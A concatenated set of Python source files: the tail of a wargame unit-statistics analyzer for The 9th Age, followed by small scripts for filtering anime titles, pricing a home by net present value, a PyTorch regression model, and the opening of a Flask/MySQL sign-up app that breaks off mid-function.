ltest.append(['','']+len(l1)*['','',''])\r\n if i%35== 0 and (i!=0 or k!=0):\r\n if i==35:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['Move','and','Shoot'])\r\n elif i==70:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['Stand','and','Shoot'])\r\n elif i==105:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','Soft','Cover'])\r\n elif i==140:\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','Hard','Cover'])\r\n if i==0 and k!=0: # new ranged interval\r\n ltest.append(['','']+(len(l1)-1)*['','','']+[lranint[k-1],'-',lranint[k]])\r\n ltest.append(['','']+(len(l1)-1)*['','','']+['','','Normal'])\r\n #ltest.append([\"res\",\"arm\"]+len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n ltest.append(np.array(ltemp[i+k*175])[1:].tolist())\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n\r\ndef compare_surv_mi(l1,l2,test=False):\r\n lnorm=np.array([[] for i in range(len(l1[0]))])\r\n for mat in l1:\r\n lnorm=np.concatenate((lnorm,np.array(mat)[:,4,None]),1)\r\n order=lnorm.argsort()\r\n order3=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(l1)): # len(l1)=number of units\r\n order3=np.concatenate((order3, order[:,i,None], order[:,i,None],order[:,i,None]),1)\r\n order3=order3[:,::-1].tolist() # reverse order (best unit first)\r\n lret=np.concatenate((np.array(l1)[0,:,:3],np.array(order3)),1).tolist()\r\n for i in range(len(lret)):\r\n for j in range(len(l1)): # len(l1)=number of units\r\n lret[i][3+3*j]=l2[int(order3[i][3*j])] # unit name\r\n lret[i][3+3*j+1]=l1[int(order3[i][3*j+1])][i][3] # dmg\r\n lret[i][3+3*j+2]=(np.array(l1[int(order3[i][3*j+2])][i][4])/np.array(l1[int(order3[i][3*0+2])][i][4])).tolist() # determine cost effectiveness\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(l1[0]))])\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n \r\n ltest=[[\"aim\",\"str\",\"ap\"]]\r\n ltest[0].extend(len(l1)*[\"unit\",\"att\",\"eff\"])\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in l2:\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+len(l1)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n k=0\r\n for row in ltest:\r\n print(string.format(*row))\r\n if k%7==0 and k!=0:\r\n print()\r\n k+=1\r\n else:\r\n return lret\r\n \r\ndef filter_me(l,_def=-1,res=-1,arm=-1,test=False):\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][0]==_def or _def==-1) and (l[i][1]==res or res==-1) and (l[i][2]==arm or arm==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltest=[[\"def\",\"res\",\"arm\"]]\r\n ltest[0].extend(int((len(l[0])-3)/3)*[\"unit\",\"dmg\",\"eff\"])\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n ltest.extend(ltemp)\r\n 
dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+int((len(l[0])-3)/3)*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter_me_surv(l,off=-1,_str=-1,ap=-1,test=False):\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][0]==off or off==-1) and (l[i][1]==_str or _str==-1) and (l[i][2]==ap or ap==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltest=[[\"off\",\"str\",\"ap\"]]\r\n ltest[0].extend(int((len(l[0])-3)/3)*[\"unit\",\"att\",\"eff\"])\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+int((len(l[0])-3)/3)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter_mi(l,res=-1,arm=-1,test=False):\r\n lranint=[]\r\n for i in range(0,len(l),175): # 7 (different arm val) * 5 (different res val) * 5 (different sit) = 175 rows per range interval\r\n lranint.append(l[i][0])\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][1]==res or res==-1) and (l[i][2]==arm or arm==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n # Header\r\n #ltest=[]\r\n nu=int((len(l[0])-3)/3) # number of units\r\n lenran=int(len(lret)/len(lranint)) # length of range blocks \r\n ltest=[['','']+(nu-1)*['','','']+['0','-',lranint[0]]]\r\n ltest.append(['','']+(nu-1)*['','','']+['','','Normal'])\r\n ltest.append([\"res\",\"arm\"]+nu*[\"unit\",\"dmg\",\"eff\"])\r\n for k in range(len(lranint)):\r\n #lran2=lret[k*175:(k+1)*175]\r\n for i in range(lenran):\r\n if i%(lenran/5) == 0 and (i!=0 or k!=0): # lenran/5: number of rows per situation\r\n ltest.append(['','']+nu*['','',''])\r\n if i/(lenran/5)==1:\r\n ltest.append(['','']+(nu-1)*['','','']+['Move','and','Shoot'])\r\n elif i/(lenran/5)==2:\r\n ltest.append(['','']+(nu-1)*['','','']+['Stand','and','Shoot'])\r\n elif i/(lenran/5)==3:\r\n ltest.append(['','']+(nu-1)*['','','']+['','Soft','Cover'])\r\n elif i/(lenran/5)==4:\r\n ltest.append(['','']+(nu-1)*['','','']+['','Hard','Cover'])\r\n if i==0 and k!=0: # new ranged interval\r\n ltest.append(['','']+nu*['','',''])\r\n ltest.append(['','']+(nu-1)*['','','']+[lranint[k-1],'-',lranint[k]])\r\n ltest.append(['','']+(nu-1)*['','','']+['','','Normal'])\r\n #ltest.append([\"res\",\"arm\"]+len(l1)*[\"unit\",\"dmg\",\"eff\"])\r\n 
ltest.append(np.array(ltemp[i+k*lenran])[1:].tolist())\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5}\"+nu*(\" {: >%d} {: >5} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n \r\ndef filter_mi_surv(l,aim=-1,_str=-1,ap=-1,test=False):\r\n lret=[]\r\n for i in range(len(l)):\r\n if (l[i][0]==aim or aim==-1) and (l[i][1]==_str or _str==-1) and (l[i][2]==ap or ap==-1):\r\n lret.append(l[i])\r\n if test==True:\r\n ltest=[[\"aim\",\"str\",\"ap\"]]\r\n ltest[0].extend(int((len(l[0])-3)/3)*[\"unit\",\"att\",\"eff\"])\r\n ltemp=np.array([[] for i in range(len(lret))])\r\n lstr=np.array([[] for i in range(len(lret))]) # list of all unit names\r\n for i in range(len(lret[0])):\r\n if type(lret[0][i])==str: # test if rounding is sensible\r\n ltemp=np.concatenate((ltemp,np.array(lret)[:,i,None]),1)\r\n lstr=np.concatenate((lstr,np.array(lret)[:,i,None]),1)\r\n else: # double array because of type conv\r\n ltemp=np.concatenate((ltemp,np.array(np.array(lret)[:,i,None],dtype='float64').round(2)),1)\r\n ltest.extend(ltemp)\r\n dist=0 # distance between unit columns\r\n for string in lstr.flatten().tolist():\r\n dist=max(dist,len(string))\r\n dist+=5\r\n string=\"{: >5} {: >5} {: >5}\"+int((len(l[0])-3)/3)*(\" {: >%d} {: >6} {: >5}\" %dist)\r\n for row in ltest:\r\n print(string.format(*row))\r\n else:\r\n return lret\r\n\r\nwf=lambda fname,l: np.savetxt(\"./data/\"+fname+\".txt\",np.array(l))\r\nlf=lambda fname: np.loadtxt(\"./data/\"+fname+\".txt\").tolist()\r\n\r\ndef wr_he():\r\n # Characters\r\n \r\n # Mounts\r\n \r\n # Core\r\n # Citizen Spears\r\n wf(\"cs_chd\",melee(20, 4, 3, 2, 260, hmod=1))\r\n wf(\"cs\",melee(20, 4, 3, 1, 260, hmod=1))\r\n # Highborn Lancers\r\n wf(\"hl_chg\",melee([5,5], [4,3], [5,3], [2,0], 210, hmod=[1,0]))\r\n wf(\"hl\",melee([5,5], [4,3], [3,3], [0,0], 210, hmod=[1,0]))\r\n # Ellein Reavers\r\n wf(\"er_me_chg\",melee([5,5], [4,3], [4,3], [1,0], 180, hmod=[1,0]))\r\n wf(\"er_me\",melee([5,5], [4,3], [3,3], [0,0], 180, hmod=[1,0]))\r\n wf(\"er_mi\",missile(24,5,3,3,0,180))\r\n # Citizen Archers\r\n wf(\"ca_me\",melee(10, 4, 3, 0, 150, hmod=1))\r\n wf(\"ca_mi\",missile(30,10, 3, 3, 0, 150,acc=True))\r\n # Seaguard\r\n wf(\"sg_me_chd\",melee(15, 4, 3, 2, 240, hmod=1))\r\n wf(\"sg_me\",melee(15, 4, 3, 1, 240, hmod=1))\r\n wf(\"sg_mi\",missile(24,15, 3, 3, 0, 240,sta=True))\r\n \r\n # Special\r\n # Sword Masters\r\n wf(\"sm\",melee(10,6,5,2,125,hmod=1))\r\n # Lion Guard\r\n wf(\"lg_mw\",melee(10, 5, 6, 3, 220, mw=2))\r\n wf(\"lg\",melee(10, 5, 6, 3, 220))\r\n # Flame Wardens\r\n wf(\"fw\",melee(15, 5, 4, 1, 260, hmod=1))\r\n # Knights of Ryma\r\n wf(\"kor_chg\",melee([10,5], [5,3], [6,3], [3,0], 320, hmod=[1,0]))\r\n wf(\"kor\",melee([10,5], [5,3], [4,3], [1,0], 320, hmod=[1,0]))\r\n # Reaver Chariots\r\n wf(\"rc_me_chg\",melee([2,2,0], [4,3,0], [4,3,5], [1,0,2], 110, autohits=[0,0,3.5], hmod=[1,0,0]))\r\n wf(\"rc_me\",melee([2,2,0], [4,3,0], [3,3,5], [0,0,2], 110, hmod=[1,0,0]))\r\n wf(\"rc_mi\",missile(30,2, 3, 3, 0, 90))\r\n # Lion Chariot\r\n wf(\"lc_chg_mw\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195, mw=[2,1,1], autohits=[0,0,4.5]))\r\n wf(\"lc_chg\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195, autohits=[0,0,4.5]))\r\n wf(\"lc_mw\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195, mw=[2,1,1]))\r\n wf(\"lc\",melee([2,4,0], [5,5,0], [6,5,5], [3,2,2], 195))\r\n # Giant Eagles\r\n wf(\"ge_st\",melee(2, 5, 4, 1, 
100,autohits=1)) # Large => stomp(1)\r\n wf(\"ge\",melee(2, 5, 4, 1, 100))\r\n # Frost Phoenix\r\n wf(\"frp_st\",melee(4, 5+2, 5, 2, 340, autohits=3.5)) # Gigantic => stomp(d6)\r\n wf(\"frp_wb_st\",melee([4,2], [5+2,5+2], [5,4], [2,1], 380, autohits=[3.5,0], hmod=[0,1])) # Gigantic => stomp(d6)\r\n wf(\"frp\",melee(4, 5+2, 5, 2, 340))\r\n wf(\"frp_wb\",melee([4,2], [5+2,5+2], [5,4], [2,1], 380, hmod=[0,1]))\r\n #Fire Phoenix\r\n wf(\"fip_st\",melee([4,0], [5,0], [5,4], [2,1], 365, autohits=[3.5,3.5])) # Gigantic => stomp(d6)\r\n wf(\"fip_wb_st\",melee([4,0,2], [5,0,5], [5,4,4], [2,1,1], 405, autohits=[3.5,3.5,0], hmod=[0,0,1])) # Gigantic => stomp(d6)\r\n wf(\"fip\",melee([4,0], [5,0], [5,4], [2,1], 365, autohits=[0,3.5]))\r\n wf(\"fip_wb\",melee([4,0,2], [5,0,5], [5,4,4], [2,1,1], 405, autohits=[0,3.5,0], hmod=[0,0,1]))\r\n # Initiate of the Fiercy Heart\r\n wf(\"iotfh_st_br\",melee([1,4,0], [4,5,0], [3,5,4], [0,2,1], 330, autohits=[0,1,7], hmod=[1,0,0])) # Large => stomp(1)\r\n wf(\"iotfh_br\",melee([1,4,0], [4,5,0], [3,5,4], [0,2,1], 330, autohits=[0,0,7], hmod=[1,0,0]))\r\n wf(\"iotfh_st\",melee([1,4], [4,5], [3,5], [0,2], 330, autohits=[0,1], hmod=[1,0])) # Large => stomp(1)\r\n wf(\"iotfh\",melee([1,4], [4,5], [3,5], [0,2], 330, hmod=[1,0]))\r\n # Sea Guard Reaper\r\n wf(\"sgr_me\",melee(2, 4, 3, 0, 190,hmod=1))\r\n wf(\"sgr_mi_1_1\",missile(48,1, 3, 6, 10, 190,mw=2,mof=True,rel=True))\r\n wf(\"sgr_mi_1_5\",missile(48,[1,1], 3, [3,6], [10,10], 190,mw=[1,1],aa=[4,1],mof=True,rel=True)) # mw=1 is more realistic\r\n wf(\"sgr_mi_6\",missile(48,6, 3, 4, 2, 190,mof=True,rel=True))\r\n # Sky Sloop\r\n wf(\"ss_me_chg\",melee([2,2,0],[4,4,0],[4,4,5],[1,1,2],225,autohits=[0,0,3.5],hmod=[1,0,0]))\r\n wf(\"ss_me\",melee([2,2,0],[4,4,0],[3,4,5],[0,1,2],225,hmod=[1,0,0]))\r\n wf(\"ss_mi\",missile(24,4,3,5,3,225,qtf=True,rel=True))\r\n \r\n # Queen's Bows\r\n # Queen's Guard\r\n wf(\"qg_me\",melee(5, 5, 3, 0, 135,hmod=1))\r\n wf(\"qg_me_s_chd\",melee(5, 5, 3, 2, 140,hmod=1))\r\n wf(\"qg_me_s\",melee(5, 5, 3, 1, 140,hmod=1))\r\n wf(\"qg_mi\",missile(30,5, 2, 4, 1, 135))\r\n # Grey Watchers\r\n wf(\"gw_me\",melee(5, 4, 3, 0, 135))\r\n wf(\"gw_me_pw\",melee(10, 4, 3, 0, 140))\r\n wf(\"gw_mi\",missile(30,5, 2, 3, 0, 135,acc=True))\r\n \r\nif __name__ == \"__main__\":\r\n wr_he()\r\n \r\n # Core\r\n # Citizen Spears\r\n cs_chd=lf(\"cs_chd\")\r\n cs=lf(\"cs\")\r\n cs_sv_me=surv_me(20, 4, 3, 2, 260)\r\n cs_sv_mi=surv_mi(20, 3, 2, 260)\r\n # Highborn Lancers\r\n hl_chg=lf(\"hl_chg\")\r\n hl=lf(\"hl\")\r\n hl_sv_me=surv_me(5,4,3,5,210)\r\n hl_sv_mi=surv_mi(5,3,5,210)\r\n # Ellein Reavers\r\n er_me_chg=lf(\"er_me_chg\")\r\n er_me=lf(\"er_me\")\r\n er_mi=lf(\"er_mi\")\r\n er_sv_me=surv_me(5, 4, 3, 2, 180)\r\n er_sv_mi=surv_mi(5, 3, 2, 180)\r\n # Citizen Archers\r\n ca_me=lf(\"ca_me\")\r\n ca_mi=lf(\"ca_mi\")\r\n ca_sv_me=surv_me(10, 4, 3, 1, 150)\r\n ca_sv_mi=surv_mi(10, 3, 1, 150)\r\n # Seaguard\r\n sg_me_chd=lf(\"sg_me_chd\")\r\n sg_me=lf(\"sg_me\")\r\n sg_mi=lf(\"sg_mi\")\r\n sg_sv_me=surv_me(15, 5, 3, 2, 240)\r\n sg_sv_mi=surv_mi(15, 3, 2, 240)\r\n \r\n # Special\r\n # Sword Masters\r\n sm=lf(\"sm\")\r\n sm_sv_me=surv_me(5, 6, 3, 2, 125)\r\n sm_sv_mi=surv_mi(5, 3, 2, 125)\r\n # Lion Guard\r\n lg_mw=lf(\"lg_mw\")\r\n lg=lf(\"lg\")\r\n lg_sv_me=surv_me(10, 5, 3, 3, 220)\r\n lg_sv_mi=surv_mi(10, 3, 4, 220)\r\n lg_bh_sv_mi=surv_mi(10, 3, 4, 230, ht=1)\r\n # Flame Wardens\r\n fw=lf(\"fw\")\r\n fw_sv_me=surv_me(15, 5, 3, 2, 260,aeg=4)\r\n fw_sv_mi=surv_mi(15, 3, 2, 260,aeg=4)\r\n # Knights of Ryma\r\n 
kor_chg=lf(\"kor_chg\")\r\n kor=lf(\"kor\")\r\n kor_sv_me=surv_me(5, 5, 3, 5, 320,aeg=6)\r\n kor_f_sv_me=surv_me(5, 5, 3, 5, 320,aeg=3)\r\n kor_sv_mi=surv_mi(5, 3, 5, 320,aeg=6)\r\n kor_f_sv_mi=surv_mi(5, 3, 5, 320,aeg=3)\r\n # Reaver Chariots\r\n rc_me_chg=lf(\"rc_me_chg\")\r\n rc_me=lf(\"rc_me\")\r\n rc_mi=lf(\"rc_mi\")\r\n rc_sv_me=surv_me(3, 4, 4, 2, 110)\r\n rc_sv_mi=surv_mi(3, 4, 2, 110)\r\n # Lion Chariot\r\n lc_chg_mw=lf(\"lc_chg_mw\")\r\n lc_chg=lf(\"lc_chg\")\r\n lc_mw=lf(\"lc_mw\")\r\n lc=lf(\"lc\")\r\n lc_sv_me=surv_me(4, 5, 4, 4, 195)\r\n lc_sv_mi=surv_mi(4, 4, 4, 195)\r\n # Giant Eagles\r\n ge_st=lf(\"ge_st\")\r\n ge=lf(\"ge\")\r\n ge_sv_me=surv_me(3,5,4,0,100)\r\n ge_sv_mi=surv_mi(3,4,0,100)\r\n # Frost Phoenix\r\n frp_st=lf(\"frp_st\")\r\n frp_wb_st=lf(\"frp_wb_st\")\r\n frp=lf(\"frp\")\r\n frp_wb=lf(\"frp_wb\")\r\n frp_sv_me=surv_me(5, 7, 5, 3, 340,aeg=5)\r\n frp_wb_sv_me=surv_me(5, 7, 5, 3, 380,aeg=5)\r\n frp_sv_mi=surv_mi(5, 5, 3, 340,aeg=5)\r\n frp_wb_sv_mi=surv_mi(5, 5, 3, 380,aeg=5)\r\n #Fire Phoenix\r\n fip_st=lf(\"fip_st\")\r\n fip_wb_st=lf(\"fip_wb_st\")\r\n fip=lf(\"fip\")\r\n fip_wb=lf(\"fip_wb\")\r\n fip_sv_me=surv_me(5, 5, 5, 3, 365)\r\n fip_f_sv_me=surv_me(5, 5, 5, 3, 365,aeg=3)\r\n fip_wb_sv_me=surv_me(5, 5, 5, 3, 405)\r\n fip_wb_f_sv_me=surv_me(5, 5, 5, 3, 405,aeg=3)\r\n fip_sv_mi=surv_mi(5, 5, 3, 365)\r\n fip_f_sv_mi=surv_mi(5, 5, 3, 365,aeg=3)\r\n fip_wb_sv_mi=surv_mi(5, 5, 3, 405)\r\n fip_wb_f_sv_mi=surv_mi(5, 5, 3, 405,aeg=3)\r\n # Initiate of the Fiercy Heart\r\n iotfh_st_br=lf(\"iotfh_st_br\")\r\n iotfh_br=lf(\"iotfh_br\")\r\n iotfh_st=lf(\"iotfh_st\")\r\n iotfh=lf(\"iotfh\")\r\n iotfh_sv_me=surv_me(4, 4, 5, 4, 330)\r\n iotfh_sv_mi=surv_mi(4, 5, 4, 330)\r\n # Sea Guard Reaper\r\n sgr_me=lf(\"sgr_me\")\r\n sgr_mi_1_1=lf(\"sgr_mi_1_1\")\r\n sgr_mi_1_5=lf(\"sgr_mi_1_5\")\r\n sgr_mi_6=lf(\"sgr_mi_6\")\r\n sgr_sv_me=surv_me(4, 1, 4, 1, 190)\r\n sgr_sv_mi=surv_mi(4, 4, 1, 190)\r\n # Sky Sloop\r\n ss_me_chg=lf(\"ss_me_chg\")\r\n ss_me=lf(\"ss_me\")\r\n ss_mi=lf(\"ss_mi\")\r\n ss_sv_me=surv_me(4, 4, 4, 2, 225)\r\n ss_sv_mi=surv_mi(4, 4, 2, 225,ht=1)\r\n \r\n # Queen's Bows\r\n # Queen's Guard\r\n qg_me=lf(\"qg_me\")\r\n qg_me_s_chd=lf(\"qg_me_s_chd\")\r\n qg_me_s=lf(\"qg_me_s\")\r\n qg_mi=lf(\"qg_mi\")\r\n qg_surv_me=surv_me(5, 5, 3, 1, 135)\r\n qg_surv_mi=surv_mi(5, 3, 1, 135)\r\n # Grey Watchers\r\n gw_me=lf(\"gw_me\")\r\n gw_me_pw=lf(\"gw_me_pw\")\r\n gw_mi=lf(\"gw_mi\")\r\n gw_sv_me=surv_me(5, 4, 3, 1, 135)\r\n gw_sv_mi=surv_mi(5, 3, 1, 135,ht=1)\r\n","repo_name":"EternalNothingness/t9a_analyzer","sub_path":"t9a_analyzer.py","file_name":"t9a_analyzer.py","file_ext":"py","file_size_in_byte":39137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"5235218223","text":"readfrom = 'animetitles.txt'\nwriteto = 'foo.txt'\n\n\nwith open(readfrom, \"rt\") as f:\n temp = f.read()\ntitles = temp.split('\\n')\n\nfiltered = filter(lambda s: '|1|' in s, titles)\ntext = \"\"\nfor line in filtered:\n\ttext += line\n\ttext += '\\n'\n\n\nwith open(writeto, \"wt\") as f:\n f.write(text)\n","repo_name":"reckert477/Term-Project","sub_path":"edit anime titles.py","file_name":"edit anime titles.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7953490300","text":"\ndef price_this_home(home_price, hurdle_rate, expected_sale_price, holding_months):\n present_value = expected_sale_price / (1 + (hurdle_rate / 12)) ** 
holding_months\n if present_value > home_price:\n print(\"Buy this one, junior analyst! It's worth more than it's selling for.\")\n elif present_value < home_price:\n print(\"Don't buy this, as it's offered at a price higher than what it's worth.\")\n elif present_value == home_price:\n print(\n \"Breakeven case! You can expect to earn exactly your hurdle rate on this deal.\"\n )\n\n\n net_present_value = present_value - home_price\n return net_present_value\n\n\n\n# Run the function\nnpv = price_this_home(\n home_price=100000, expected_sale_price=180000, hurdle_rate=0.10, holding_months=36\n)\n\n# Print the npv\nprint(f\"The Expected Profit is: {npv}\")\n","repo_name":"MuayThaiLegz/Class-practice","sub_path":"ToGit-HUB/Unsolved/split_second_part_2.py","file_name":"split_second_part_2.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1862700834","text":"\"\"\"[DESAFIO] Crie um jogo onde o computador vai sortear um número entre 1 e 5 o \r\njogador vai tentar descobrir qual foi o valor sorteado.\"\"\"\r\n\r\nimport random\r\n\r\nescolhas = [1, 2, 3, 4, 5]\r\n\r\ndef input_int(mensagem):\r\n while True:\r\n entrada = int(input(mensagem))\r\n if entrada >= 1 and entrada <= 5:\r\n return entrada\r\n else:\r\n print(\"Entrada inválida. Escolha um número entre 1 e 5.\")\r\n\r\ndef resultado(escolha_usuario, escolha_ia):\r\n if escolha_usuario == escolha_ia:\r\n return \"Você adivinhou o número\"\r\n else:\r\n return \"Você errou. Tente mais uma vez!\"\r\n\r\ndef main():\r\n escolha_ia = random.randint(1, 5)\r\n\r\n print(\"\\nBem-vindo ao jogo de Adivinhação!\\n\"\r\n \"Tente adivinhar o número escolhido pela IA.\")\r\n\r\n escolha_usuario = input_int(\"\\nDigite o número entre 1 e 5 para tentar adiivinhar o número: \") \r\n\r\n resultado_jogo = resultado(escolha_usuario, escolha_ia)\r\n\r\n print(f\"\\nVocê escolheu o número: {escolha_usuario}\\n\"\r\n f\"O número escolhido pela IA foi: {escolha_ia}\\n\" \r\n f\"\\n{resultado_jogo}\\n\")\r\n\r\nmain()","repo_name":"marcospontesjunior/exerc-algoritmo-py","sub_path":"exercicios/03-condicoes-compostas/exercicio_32_desafio.py","file_name":"exercicio_32_desafio.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17819032849","text":"import logging\nimport torch\nimport torch.nn.functional as F\nfrom typing import Any\n\nfrom torch_points3d.models.base_architectures import BackboneBasedModel\n\nlog = logging.getLogger(__name__)\n\nLOSSES = {\n \"smoothl1\": F.smooth_l1_loss,\n \"l2\": F.mse_loss,\n \"l1\": F.l1_loss,\n}\n\n\nclass Regression_MP(BackboneBasedModel):\n def __init__(self, option, model_type, dataset, modules):\n \"\"\"Initialize this model class.\n Parameters:\n opt -- training/test options\n A few things can be done here.\n - (required) call the initialization function of BaseModel\n - define loss function, visualization images, model names, and optimizers\n \"\"\"\n BackboneBasedModel.__init__(\n self, option, model_type, dataset, modules\n ) # call the initialization method of UnetBasedModel\n\n nn = option.mlp_cls.nn\n self.dropout = option.mlp_cls.get(\"dropout\")\n self.lin1 = torch.nn.Linear(nn[0], nn[1])\n self.lin2 = torch.nn.Linear(nn[2], nn[3])\n self.lin3 = torch.nn.Linear(nn[4], dataset.num_classes)\n\n self.loss_fn = LOSSES[option.get(\"loss_fn\", \"smoothl1\")]\n\n self.loss_names = [\"loss_regr\"]\n\n 
self.visual_names = [\"data_visual\"]\n\n def set_input(self, data, device):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n Parameters:\n input: a dictionary that contains the data itself and its metadata information.\n \"\"\"\n data = data.to(device)\n self.input = data\n self.labels = data.y\n self.batch_idx = data.batch\n\n def forward(self, *args, **kwargs) -> Any:\n \"\"\"Run forward pass. This will be called by both functions <optimize_parameters> and <test>.\"\"\"\n data = self.down_modules[0](self.input)\n\n x = F.relu(self.lin1(data.x))\n x = F.dropout(x, p=self.dropout, training=bool(self.training))\n x = self.lin2(x)\n x = F.dropout(x, p=self.dropout, training=bool(self.training))\n x = self.lin3(x)\n self.output = x\n\n if self.labels is not None:\n self.loss_regr = F.smooth_l1_loss(self.output, self.labels) + self.get_internal_loss()\n\n self.data_visual = self.input\n self.data_visual.y = self.labels\n self.data_visual.pred = self.output\n return self.output\n\n def backward(self):\n \"\"\"Calculate losses, gradients, and update network weights; called in every training iteration\"\"\"\n # caculate the intermediate results if necessary; here self.output has been computed during function <forward>\n # calculate loss given the input and intermediate results\n self.loss_regr.backward() # calculate gradients of network G w.r.t. loss_G\n","repo_name":"j-friis/sdfi-powerlines","sub_path":"torch-3dpoints-powerline/torch_points3d/models/regression/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"27880171018","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import json\nfrom flask import session\nfrom flask import redirect\nfrom flask import url_for\nfrom flaskext.mysql import MySQL\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime, date, time, timedelta\nimport config\n\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\n\nmysql = MySQL()\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = config.DB_USER\napp.config['MYSQL_DATABASE_PASSWORD'] = config.DB_PW\napp.config['MYSQL_DATABASE_DB'] = config.DB_SCHEMA\napp.config['MYSQL_DATABASE_HOST'] = config.DB_HOST\nmysql.init_app(app)\n\napp.secret_key = 'I miss the comfort in being sad.'\n\n\n@app.route(\"/\")\ndef main():\n if session.get('user'):\n return redirect('/userHome')\n else:\n return render_template('index.html')\n\n\n@app.route('/signUp', methods=['GET'])\ndef show_sign_up():\n return render_template('sign-up.html')\n\n\n@app.route('/signUp', methods=['POST'])\ndef sign_up():\n try:\n _name = request.form['inputName']\n _email = request.form['inputEmail']\n _password = request.form['inputPassword']\n\n if _name and _email and _password:\n conn = mysql.connect()\n cursor = conn.cursor()\n _hashed_password = generate_password_hash(_password)\n cursor.callproc('sp_createUser', (_name, _email, _hashed_password))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return json.dumps({'redirect': url_for('sign_in')})\n else:\n return json.dumps({'error': str(data[0][0])}), 400\n else:\n return json.dumps({'html': '<span>Enter the required fields</span>'}), 400\n\n except Exception as e:\n return json.dumps({'redirect': url_for('error')}), 500\n finally:\n cursor.close()\n 
